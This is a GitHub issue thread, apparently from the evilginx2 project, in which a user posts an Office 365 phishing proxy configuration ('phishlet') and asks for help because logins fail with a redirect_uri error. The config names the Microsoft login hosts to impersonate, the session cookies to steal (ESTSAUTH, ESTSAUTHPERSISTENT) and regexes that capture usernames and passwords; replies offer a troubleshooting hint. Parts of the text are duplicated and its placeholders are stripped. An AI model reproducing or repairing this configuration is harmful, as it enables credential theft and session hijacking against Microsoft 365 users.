xviiixxix commented 5 years ago

Page opens, when i try to sign in, it goes to a difference page

We're unable to complete your request

invalid_request: The provided value for the input parameter 'redirect_uri' is not valid. The expected value is a URI which matches a redirect URI registered for this client application.

name: 'o365' author: '@jamescullum' min_ver: '2.3.0' proxy_hosts:

{phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
{phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
The lines below are needed if your target organization utilizes ADFS.

If they do, you need to uncomment all following lines that contain <...>

To get the correct ADFS subdomain, test the web login manually and check where you are redirected.

Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:

= adfs

= example.com

= adfs.example.com

- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}

- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}

sub_filters:
{triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
{triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
Uncomment and fill in if your target organization utilizes ADFS

- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}

auth_tokens:
domain: '.login.microsoftonline.com' keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
domain: 'login.microsoftonline.com' keys: ['SignInStateCookie'] credentials: username: key: '(login|UserName)' search: '(.)' type: 'post' password: key: '(passwd|Password)' search: '(.)' type: 'post' login: domain: 'login.microsoftonline.com' path: '/'

kgretzky commented 5 years ago

Thank you for this perfectly formatted post. The Markdown gods are satiated!

Other than that - this is not a support channel for creating phishlets. Kthxbye.

JamesCullum commented 5 years ago

It's difficult to understand your post, but I assume you forgot to either replace any of the or filled them with an empty field (which you also shouldn't do). If you don't need ADFS, just put example.com or other targets.

kgretzky / evilginx2

Office 365 YAML Not working.. Need Help #270

Page opens, when i try to sign in, it goes to a difference page

invalid_request: The provided value for the input parameter 'redirect_uri' is not valid. The expected value is a URI which matches a redirect URI registered for this client application.

The lines below are needed if your target organization utilizes ADFS.

If they do, you need to uncomment all following lines that contain <...>

To get the correct ADFS subdomain, test the web login manually and check where you are redirected.

Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:

= adfs

= example.com

= adfs.example.com

- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}

- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}

Uncomment and fill in if your target organization utilizes ADFS

- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}